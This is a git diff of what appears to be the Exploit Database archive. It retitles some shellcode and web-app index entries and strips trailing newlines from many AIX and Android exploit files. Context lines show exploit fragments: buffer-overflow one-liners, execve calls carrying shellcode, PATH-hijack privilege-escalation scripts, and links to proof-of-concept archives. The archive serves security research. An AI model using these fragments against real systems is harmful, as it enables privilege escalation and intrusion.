- Reverse UDP Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0 -42254,platforms/lin_x86/shellcode/42254.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (75 bytes)",2017-06-26,wetw0rk,lin_x86,shellcode,0 +42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0 +42254,platforms/lin_x86/shellcode/42254.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,lin_x86,shellcode,0 42339,platforms/lin_x86-64/shellcode/42339.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,lin_x86-64,shellcode,0 -42428,platforms/lin_x86/shellcode/42428.c,"Linux x86 - /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",lin_x86,shellcode,0 +42428,platforms/lin_x86/shellcode/42428.c,"Linux x86 - execve /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",lin_x86,shellcode,0 42485,platforms/lin_x86-64/shellcode/42485.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",lin_x86-64,shellcode,0 -42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86_64 - kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0 +42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86_64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0 42523,platforms/lin_x86-64/shellcode/42523.c,"Linux/x86_64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 @@ -38318,7 +38322,7 @@ id,file,description,date,author,platform,type,port 42528,platforms/php/webapps/42528.txt,"PHP Coupon Script 6.0 - 'cid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42529,platforms/php/webapps/42529.txt,"iTech Social Networking Script 3.08 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42530,platforms/php/webapps/42530.txt,"Joomla! Component FocalPoint 1.2.3 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 -42531,platforms/php/webapps/42531.txt,"Php Cloud mining Script - Authentication Bypass",2017-08-21,"Ihsan Sencan",php,webapps,0 +42531,platforms/php/webapps/42531.txt,"(Bitcoin / Dogecoin) PHP Cloud Mining Script - Authentication Bypass",2017-08-21,"Ihsan Sencan",php,webapps,0 42532,platforms/php/webapps/42532.txt,"Joomla! Component Ajax Quiz 1.8 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42533,platforms/php/webapps/42533.txt,"PHP-Lance 1.52 - 'subcat' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42534,platforms/php/webapps/42534.txt,"PHP Jokesite 2.0 - 'joke_id' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/aix/dos/15264.py b/platforms/aix/dos/15264.py index fee87b0b4..690332cbe 100755 --- a/platforms/aix/dos/15264.py +++ b/platforms/aix/dos/15264.py @@ -194,4 +194,4 @@ if __name__ == '__main__': except IOError: - print '\nFilename not found.' + print '\nFilename not found.' \ No newline at end of file diff --git a/platforms/aix/dos/16657.rb b/platforms/aix/dos/16657.rb index 0840477c2..3c1d9805a 100755 --- a/platforms/aix/dos/16657.rb +++ b/platforms/aix/dos/16657.rb @@ -104,4 +104,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/aix/dos/16929.rb b/platforms/aix/dos/16929.rb index e076a849a..93c3196ad 100755 --- a/platforms/aix/dos/16929.rb +++ b/platforms/aix/dos/16929.rb @@ -118,4 +118,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/aix/dos/22249.txt b/platforms/aix/dos/22249.txt index 1555cbd2f..da0d0eb00 100755 --- a/platforms/aix/dos/22249.txt +++ b/platforms/aix/dos/22249.txt @@ -4,4 +4,4 @@ A buffer overflow vulnerability has been discovered in the libIM library availab Under certain circumstances this issue may pose as a remote security threat. -/usr/lpp/X11/bin/aixterm -im `perl -e 'print "A"x47; print pack("l",0x11223344)'` +/usr/lpp/X11/bin/aixterm -im `perl -e 'print "A"x47; print pack("l",0x11223344)'` \ No newline at end of file diff --git a/platforms/aix/local/1001.txt b/platforms/aix/local/1001.txt index 25f6792d7..1407d6cae 100755 --- a/platforms/aix/local/1001.txt +++ b/platforms/aix/local/1001.txt @@ -286,4 +286,4 @@ bash-2.05b# rm /tmp/passwd bash-2.05b# -# milw0rm.com [2005-05-19] +# milw0rm.com [2005-05-19] \ No newline at end of file diff --git a/platforms/aix/local/1044.c b/platforms/aix/local/1044.c index 9a21e1c0b..7e7aaf7d5 100755 --- a/platforms/aix/local/1044.c +++ b/platforms/aix/local/1044.c @@ -96,4 +96,4 @@ int main() return( 0 ); } -// milw0rm.com [2005-06-14] +// milw0rm.com [2005-06-14] \ No newline at end of file diff --git a/platforms/aix/local/1045.c b/platforms/aix/local/1045.c index 69e8f81e6..db42322f1 100755 --- a/platforms/aix/local/1045.c +++ b/platforms/aix/local/1045.c @@ -97,4 +97,4 @@ int main() return( 0 ); } -// milw0rm.com [2005-06-14] +// milw0rm.com [2005-06-14] \ No newline at end of file diff --git a/platforms/aix/local/1046.c b/platforms/aix/local/1046.c index b310be688..e5614de76 100755 --- a/platforms/aix/local/1046.c +++ b/platforms/aix/local/1046.c @@ -96,4 +96,4 @@ int main() return( 0 ); } -// milw0rm.com [2005-06-14] +// milw0rm.com [2005-06-14] \ No newline at end of file diff --git a/platforms/aix/local/16659.rb b/platforms/aix/local/16659.rb index 0e53450d1..ecd08a13b 100755 --- a/platforms/aix/local/16659.rb +++ b/platforms/aix/local/16659.rb @@ -70,4 +70,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/aix/local/19214.c b/platforms/aix/local/19214.c index 3de665296..30cc476bb 100755 --- a/platforms/aix/local/19214.c +++ b/platforms/aix/local/19214.c @@ -189,5 +189,4 @@ perror("Error executing execve \n"); guninski@linux2.vmei.acad.bg http://www.geocities.com/ResearchTriangle/1711 */ -} - +} \ No newline at end of file diff --git a/platforms/aix/local/19215.c b/platforms/aix/local/19215.c index 7162550a5..1fbf2f8ad 100755 --- a/platforms/aix/local/19215.c +++ b/platforms/aix/local/19215.c @@ -79,5 +79,4 @@ main(int argc, char *argv[]) x[3000]=0; putenv(x); execl("/bin/rsh","su",(char *)0); -} - +} \ No newline at end of file diff --git a/platforms/aix/local/19216.c b/platforms/aix/local/19216.c index ec64818b0..bc66aedbd 100755 --- a/platforms/aix/local/19216.c +++ b/platforms/aix/local/19216.c @@ -58,4 +58,4 @@ int main(int ac, char **av) system("/usr/sbin/arp -f /tmp/ypx"); unlink("/tmp/ypx"); -} +} \ No newline at end of file diff --git a/platforms/aix/local/19217.c b/platforms/aix/local/19217.c index 846e11252..a31f29c3f 100755 --- a/platforms/aix/local/19217.c +++ b/platforms/aix/local/19217.c @@ -66,5 +66,4 @@ main() x[3000]=0; putenv(x); execl("/bin/passwd","passwd",(char *)0); -} - +} \ No newline at end of file diff --git a/platforms/aix/local/19287.c b/platforms/aix/local/19287.c index 44ced4964..939d45f1a 100755 --- a/platforms/aix/local/19287.c +++ b/platforms/aix/local/19287.c @@ -223,4 +223,4 @@ st " printf("\n%s %s\n",OK,getenv("HOSTNAME")); close(chaussette); - } + } \ No newline at end of file diff --git a/platforms/aix/local/19306.c b/platforms/aix/local/19306.c index 9e6998162..fddbe1c8d 100755 --- a/platforms/aix/local/19306.c +++ b/platforms/aix/local/19306.c @@ -67,5 +67,4 @@ main(int argc,char **argv,char **e){ *b=0; execle("/usr/sbin/portmir","lsd","-t",buffer,0,envp); -} - +} \ No newline at end of file diff --git a/platforms/aix/local/19307.c b/platforms/aix/local/19307.c index 377805436..a09b8e2f7 100755 --- a/platforms/aix/local/19307.c +++ b/platforms/aix/local/19307.c @@ -101,4 +101,4 @@ main(int argc,char **argv,char **env) execve("/usr/sbin/ping",args,newenv); perror("Error executing execve \n"); -} +} \ No newline at end of file diff --git a/platforms/aix/local/19309.c b/platforms/aix/local/19309.c index e12b40f18..a7c22c4f2 100755 --- a/platforms/aix/local/19309.c +++ b/platforms/aix/local/19309.c @@ -99,5 +99,4 @@ ffff); args[2]=(char*)&frame[0]; execve("/usr/sbin/lchangelv",args,newenv); perror("Error executing execve \n"); -} - +} \ No newline at end of file diff --git a/platforms/aix/local/19318.c b/platforms/aix/local/19318.c index 39bef6825..f80175c43 100755 --- a/platforms/aix/local/19318.c +++ b/platforms/aix/local/19318.c @@ -110,4 +110,4 @@ void main(int argc, char **argv) execle("/usr/lib/desktop/permissions", "permissions", "-display", getenv("DISPLAY"), "/bin/ls", buf, 0, env); perror("execl failed"); -} +} \ No newline at end of file diff --git a/platforms/aix/local/20452.c b/platforms/aix/local/20452.c index 96452bedc..f060df85a 100755 --- a/platforms/aix/local/20452.c +++ b/platforms/aix/local/20452.c @@ -75,5 +75,4 @@ main(int argc,char **argv,char **e){ *b=0; execle("/usr/bin/setsenv","lsd",buffer,0,envp); -} - +} \ No newline at end of file diff --git a/platforms/aix/local/20453.c b/platforms/aix/local/20453.c index 7d03624e7..28eb073af 100755 --- a/platforms/aix/local/20453.c +++ b/platforms/aix/local/20453.c @@ -83,5 +83,4 @@ main(int argc,char **argv,char **e){ *b=0; execle("/usr/lib/lpd/digest","lsd",buffer,"lsd",0,envp); -} - +} \ No newline at end of file diff --git a/platforms/aix/local/20454.sh b/platforms/aix/local/20454.sh index a2e7521ae..af36beb50 100755 --- a/platforms/aix/local/20454.sh +++ b/platforms/aix/local/20454.sh @@ -55,4 +55,4 @@ CC=A`$PERL $SHPL` ; export CC /bin/rm -f $SHPL /usr/bin/enq -w"`perl -e 'print "\x2f\xf2\x2b\x10"x600'`" -#EOF +#EOF \ No newline at end of file diff --git a/platforms/aix/local/20455.c b/platforms/aix/local/20455.c index d2e55131d..bad15ed17 100755 --- a/platforms/aix/local/20455.c +++ b/platforms/aix/local/20455.c @@ -75,5 +75,4 @@ main(int argc,char **argv,char **e){ for(i=0;i caughq.org execve("/usr/bin/passwd",[""],{"EGG":egg+shellcode,"LC_TIME":bof}) -# milw0rm.com [2007-11-07] +# milw0rm.com [2007-11-07] \ No newline at end of file diff --git a/platforms/aix/local/699.c b/platforms/aix/local/699.c index 2f46eed94..0fa6faf0b 100755 --- a/platforms/aix/local/699.c +++ b/platforms/aix/local/699.c @@ -69,4 +69,4 @@ int main(int argc, char **argv) { execle("/usr/bin/paginit", "/usr/bin/paginit", buf, 0, env); } -// milw0rm.com [2004-12-20] +// milw0rm.com [2004-12-20] \ No newline at end of file diff --git a/platforms/aix/local/701.sh b/platforms/aix/local/701.sh index 97a20e27f..c18a619e1 100755 --- a/platforms/aix/local/701.sh +++ b/platforms/aix/local/701.sh @@ -10,4 +10,4 @@ chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh -# milw0rm.com [2004-12-21] +# milw0rm.com [2004-12-21] \ No newline at end of file diff --git a/platforms/aix/local/898.sh b/platforms/aix/local/898.sh index b76b107ff..fef093dac 100755 --- a/platforms/aix/local/898.sh +++ b/platforms/aix/local/898.sh @@ -22,4 +22,4 @@ PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./" export PATH exec /tmp/ksh -# milw0rm.com [2005-03-25] +# milw0rm.com [2005-03-25] \ No newline at end of file diff --git a/platforms/aix/local/9306.txt b/platforms/aix/local/9306.txt index b4b0193b2..8c6aa7959 100755 --- a/platforms/aix/local/9306.txt +++ b/platforms/aix/local/9306.txt @@ -30,4 +30,4 @@ MALLOCDEBUG=report_allocations,output:/bin/filename echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions." -# milw0rm.com [2009-07-30] +# milw0rm.com [2009-07-30] \ No newline at end of file diff --git a/platforms/aix/local/9645.sh b/platforms/aix/local/9645.sh index c201df743..cd4e0e0e3 100755 --- a/platforms/aix/local/9645.sh +++ b/platforms/aix/local/9645.sh @@ -87,4 +87,4 @@ umask 0 ls -l $_LIB_INIT_DBG_FILE echo -# milw0rm.com [2009-09-11] +# milw0rm.com [2009-09-11] \ No newline at end of file diff --git a/platforms/aix/remote/14407.c b/platforms/aix/remote/14407.c index 9326020d9..f0a6c66c8 100755 --- a/platforms/aix/remote/14407.c +++ b/platforms/aix/remote/14407.c @@ -113,4 +113,4 @@ main(int argc, char *argv[]) printf("done!\n"); clnt_destroy(cl); -} +} \ No newline at end of file diff --git a/platforms/aix/remote/14456.c b/platforms/aix/remote/14456.c index 815e5ae9e..e13d55fb5 100755 --- a/platforms/aix/remote/14456.c +++ b/platforms/aix/remote/14456.c @@ -325,4 +325,4 @@ void usage(char *exe) " [-d writable directory] [-c user to crack] [-s use 'LIST' command on AIX 5.3]\n", exe); exit(0); -} +} \ No newline at end of file diff --git a/platforms/aix/remote/16930.rb b/platforms/aix/remote/16930.rb index 4fdaf236a..e6c05f005 100755 --- a/platforms/aix/remote/16930.rb +++ b/platforms/aix/remote/16930.rb @@ -286,4 +286,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/aix/remote/19532.pl b/platforms/aix/remote/19532.pl index b67d0c24e..bcd7d73a0 100755 --- a/platforms/aix/remote/19532.pl +++ b/platforms/aix/remote/19532.pl @@ -156,4 +156,4 @@ open F, "| od -tx1"; printf F $buf; close F; -# EOF +# EOF \ No newline at end of file diff --git a/platforms/aix/remote/21093.c b/platforms/aix/remote/21093.c index 6a639fabb..a9305038f 100755 --- a/platforms/aix/remote/21093.c +++ b/platforms/aix/remote/21093.c @@ -191,5 +191,4 @@ main(int argc,char **argv){ } } } -} - +} \ No newline at end of file diff --git a/platforms/aix/webapps/10372.txt b/platforms/aix/webapps/10372.txt index 4c9536e90..e4678d3d1 100755 --- a/platforms/aix/webapps/10372.txt +++ b/platforms/aix/webapps/10372.txt @@ -40,4 +40,4 @@ HTTP/1.1 200 OK Date: Tues, 08 Dec 2009 11:26:21 GMT Server: Apache/2.0.47 (Win32) mod_jk/1.2.5 Connection: close -Content-Type: text/html;charset=UTF-8 +Content-Type: text/html;charset=UTF-8 \ No newline at end of file diff --git a/platforms/android/dos/18630.txt b/platforms/android/dos/18630.txt index c4196aaa3..3e72128dd 100755 --- a/platforms/android/dos/18630.txt +++ b/platforms/android/dos/18630.txt @@ -79,4 +79,4 @@ for x in xrange(1,31): s.send("QUIT") - s.close() + s.close() \ No newline at end of file diff --git a/platforms/android/dos/23248.txt b/platforms/android/dos/23248.txt index 087771b07..617befd52 100755 --- a/platforms/android/dos/23248.txt +++ b/platforms/android/dos/23248.txt @@ -89,4 +89,4 @@ int main(int argc, char** argv) { fp=fopen(buf,"w"); }; return 0; -} +} \ No newline at end of file diff --git a/platforms/android/dos/28957.txt b/platforms/android/dos/28957.txt index b96a18dbb..f94dc2d95 100755 --- a/platforms/android/dos/28957.txt +++ b/platforms/android/dos/28957.txt @@ -508,4 +508,4 @@ public class SocketUtil { return pid; } -} +} \ No newline at end of file diff --git a/platforms/android/dos/31307.py b/platforms/android/dos/31307.py index 0bd832ca6..fa0e4e229 100755 --- a/platforms/android/dos/31307.py +++ b/platforms/android/dos/31307.py @@ -29,4 +29,4 @@ img = img[:6]+struct.pack('mm will now have invalid or free data (free if the forked process dies). Proof-of-concept code to trigger this condition is attached (fimg2d-lock.c) Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38557.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38557.zip \ No newline at end of file diff --git a/platforms/android/dos/38558.txt b/platforms/android/dos/38558.txt index db8c27e05..f91ae6878 100755 --- a/platforms/android/dos/38558.txt +++ b/platforms/android/dos/38558.txt @@ -21,5 +21,4 @@ intent.putExtra("data", "{'original-msg-id':1, " + "'toList':'project.zero.attacker@gmail.com'}"); ComponentName name = MainActivity.this.startService(intent); -No permissions are required to send this service intent. If successfully sent this will show up in a "sent email" notification and will be present user’s sent email folder. - +No permissions are required to send this service intent. If successfully sent this will show up in a "sent email" notification and will be present user’s sent email folder. \ No newline at end of file diff --git a/platforms/android/dos/38610.txt b/platforms/android/dos/38610.txt index 4ee956444..6c9e9672f 100755 --- a/platforms/android/dos/38610.txt +++ b/platforms/android/dos/38610.txt @@ -26,5 +26,4 @@ I/DEBUG ( 2958): #03 pc 000000000042ec00 /system/priv-app/SecGallery2015/ To reproduce, download the file and open it in Gallery Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38610.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38610.zip \ No newline at end of file diff --git a/platforms/android/dos/38611.txt b/platforms/android/dos/38611.txt index 17a324a1f..be892a403 100755 --- a/platforms/android/dos/38611.txt +++ b/platforms/android/dos/38611.txt @@ -31,5 +31,4 @@ To reproduce, download the attached file and wait, or trigger media scanning by adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38611.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38611.zip \ No newline at end of file diff --git a/platforms/android/dos/38612.txt b/platforms/android/dos/38612.txt index 677eb4d8d..3ecf7006f 100755 --- a/platforms/android/dos/38612.txt +++ b/platforms/android/dos/38612.txt @@ -37,5 +37,4 @@ To reproduce, download the image file and wait, or trigger media scanning by cal adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38612.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38612.zip \ No newline at end of file diff --git a/platforms/android/dos/38613.txt b/platforms/android/dos/38613.txt index 397271476..98aba65dd 100755 --- a/platforms/android/dos/38613.txt +++ b/platforms/android/dos/38613.txt @@ -28,5 +28,4 @@ To reproduce, download the file and open it in Gallery. This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38613.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38613.zip \ No newline at end of file diff --git a/platforms/android/dos/38614.txt b/platforms/android/dos/38614.txt index f79724550..63da48ecd 100755 --- a/platforms/android/dos/38614.txt +++ b/platforms/android/dos/38614.txt @@ -55,5 +55,4 @@ adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/she This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38614.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38614.zip \ No newline at end of file diff --git a/platforms/android/dos/39424.txt b/platforms/android/dos/39424.txt index f2642a856..eea9d07e1 100755 --- a/platforms/android/dos/39424.txt +++ b/platforms/android/dos/39424.txt @@ -37,5 +37,4 @@ adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/she Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39424.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39424.zip \ No newline at end of file diff --git a/platforms/android/dos/39425.txt b/platforms/android/dos/39425.txt index 5f58340df..915c7effc 100755 --- a/platforms/android/dos/39425.txt +++ b/platforms/android/dos/39425.txt @@ -29,4 +29,4 @@ adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/she Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39425.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39425.zip \ No newline at end of file diff --git a/platforms/android/dos/39504.c b/platforms/android/dos/39504.c index a63beb3b2..cc797eccc 100755 --- a/platforms/android/dos/39504.c +++ b/platforms/android/dos/39504.c @@ -88,4 +88,4 @@ int main(void) { close(fd); return 0; -} +} \ No newline at end of file diff --git a/platforms/android/dos/39629.txt b/platforms/android/dos/39629.txt index acbb5e6a7..87c9917fc 100755 --- a/platforms/android/dos/39629.txt +++ b/platforms/android/dos/39629.txt @@ -159,5 +159,4 @@ prNdisReq->ndisOidContent is in a static allocation of size 0x1000, and prIwReqD Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39629.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39629.zip \ No newline at end of file diff --git a/platforms/android/dos/39651.txt b/platforms/android/dos/39651.txt index 243c38285..4eb7f6d2c 100755 --- a/platforms/android/dos/39651.txt +++ b/platforms/android/dos/39651.txt @@ -55,5 +55,4 @@ Reported to Android here: https://code.google.com/p/android/issues/detail?id=185 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39651.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39651.zip \ No newline at end of file diff --git a/platforms/android/dos/39685.txt b/platforms/android/dos/39685.txt index 4b3d05bd3..6c064b15f 100755 --- a/platforms/android/dos/39685.txt +++ b/platforms/android/dos/39685.txt @@ -42,5 +42,4 @@ Where XXXXXX should be uninitialized memory from the heap. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39685.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39685.zip \ No newline at end of file diff --git a/platforms/android/dos/39686.txt b/platforms/android/dos/39686.txt index 05321e070..1aa6a6c0c 100755 --- a/platforms/android/dos/39686.txt +++ b/platforms/android/dos/39686.txt @@ -86,5 +86,4 @@ I’ve provided a PoC which exploits the issue in ICrypto::decrypt. I will just Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39686.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39686.zip \ No newline at end of file diff --git a/platforms/android/dos/39921.txt b/platforms/android/dos/39921.txt index b8e99aaca..fcde6cfe9 100755 --- a/platforms/android/dos/39921.txt +++ b/platforms/android/dos/39921.txt @@ -92,5 +92,4 @@ cpsr 0x80070030 -2147024848 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39921.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39921.zip \ No newline at end of file diff --git a/platforms/android/dos/40381.txt b/platforms/android/dos/40381.txt index 47d82b0cc..d3211260d 100755 --- a/platforms/android/dos/40381.txt +++ b/platforms/android/dos/40381.txt @@ -140,4 +140,4 @@ If there is e.g. some system_app that performs permissions checks (which use the Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40381.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40381.zip \ No newline at end of file diff --git a/platforms/android/dos/40449.txt b/platforms/android/dos/40449.txt index d0712a715..9ea6a7517 100755 --- a/platforms/android/dos/40449.txt +++ b/platforms/android/dos/40449.txt @@ -36,5 +36,4 @@ Its logcat output looks like this: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40449.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40449.zip \ No newline at end of file diff --git a/platforms/android/dos/40515.txt b/platforms/android/dos/40515.txt index fbb2521cf..36977ca43 100755 --- a/platforms/android/dos/40515.txt +++ b/platforms/android/dos/40515.txt @@ -142,5 +142,4 @@ a uint32_t is smaller than a binder_uintptr_t. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40515.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40515.zip \ No newline at end of file diff --git a/platforms/android/dos/40876.txt b/platforms/android/dos/40876.txt index e2c1ab0af..c993fbee1 100755 --- a/platforms/android/dos/40876.txt +++ b/platforms/android/dos/40876.txt @@ -165,5 +165,4 @@ Fixed in the November security bulletin at https://source.android.com/security/b Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40876.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40876.zip \ No newline at end of file diff --git a/platforms/android/dos/40913.java b/platforms/android/dos/40913.java index 6033c1063..30b751d21 100755 --- a/platforms/android/dos/40913.java +++ b/platforms/android/dos/40913.java @@ -61,4 +61,4 @@ public class MainActivity extends AppCompatActivity { Log.e(LOGTAG, "Failed to communicate with remote binder", ex); } } -} +} \ No newline at end of file diff --git a/platforms/android/dos/40945.txt b/platforms/android/dos/40945.txt index 4e629f458..c6e4ce42b 100755 --- a/platforms/android/dos/40945.txt +++ b/platforms/android/dos/40945.txt @@ -135,4 +135,4 @@ Fixed in https://source.android.com/security/bulletin/2016-12-01.html Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40945.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40945.zip \ No newline at end of file diff --git a/platforms/android/dos/40993.txt b/platforms/android/dos/40993.txt index ccf7aec0b..56ea24458 100755 --- a/platforms/android/dos/40993.txt +++ b/platforms/android/dos/40993.txt @@ -58,4 +58,4 @@ According to the default SELinux rules as present on the SM-G935F (version XXS1A Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40993.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40993.zip \ No newline at end of file diff --git a/platforms/android/dos/41161.txt b/platforms/android/dos/41161.txt index d4043a2f7..b847ed80a 100755 --- a/platforms/android/dos/41161.txt +++ b/platforms/android/dos/41161.txt @@ -67,4 +67,4 @@ The sysfs entries mentioned above are world-readable and have an SELinux context Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41161.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41161.zip \ No newline at end of file diff --git a/platforms/android/dos/41211.txt b/platforms/android/dos/41211.txt index b44d4e11f..51dec7203 100755 --- a/platforms/android/dos/41211.txt +++ b/platforms/android/dos/41211.txt @@ -30,4 +30,4 @@ This PoC uses the CFP_ROPP_* commands to modify a kernel address in the kernel V Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41211.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41211.zip \ No newline at end of file diff --git a/platforms/android/dos/41212.txt b/platforms/android/dos/41212.txt index 7d56fb272..f8551cb0e 100755 --- a/platforms/android/dos/41212.txt +++ b/platforms/android/dos/41212.txt @@ -38,4 +38,4 @@ This PoC disables the M bit in SCTLR_EL1. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41212.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41212.zip \ No newline at end of file diff --git a/platforms/android/dos/41218.txt b/platforms/android/dos/41218.txt index 0c4c727d3..2a1ab444f 100755 --- a/platforms/android/dos/41218.txt +++ b/platforms/android/dos/41218.txt @@ -44,4 +44,4 @@ This PoC s2-remaps RKP's physical address range and reads from it in EL1. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41218.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41218.zip \ No newline at end of file diff --git a/platforms/android/dos/41232.txt b/platforms/android/dos/41232.txt index 05b83d1b2..869d0d4b6 100755 --- a/platforms/android/dos/41232.txt +++ b/platforms/android/dos/41232.txt @@ -64,4 +64,4 @@ This PoC modifies an instruction within RKP's address space by repeatedly callin Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41232.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41232.zip \ No newline at end of file diff --git a/platforms/android/dos/41351.txt b/platforms/android/dos/41351.txt index 78929c715..6c49d45e1 100755 --- a/platforms/android/dos/41351.txt +++ b/platforms/android/dos/41351.txt @@ -63,5 +63,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41351.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41351.zip \ No newline at end of file diff --git a/platforms/android/dos/41352.txt b/platforms/android/dos/41352.txt index 3d771cd7c..efe11f726 100755 --- a/platforms/android/dos/41352.txt +++ b/platforms/android/dos/41352.txt @@ -47,4 +47,4 @@ u:r:lghashstorageserver:s0 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41352.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41352.zip \ No newline at end of file diff --git a/platforms/android/dos/41353.txt b/platforms/android/dos/41353.txt index 61b6d7e7d..9086a093b 100755 --- a/platforms/android/dos/41353.txt +++ b/platforms/android/dos/41353.txt @@ -92,4 +92,4 @@ disable selinux enforcement. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41353.zip 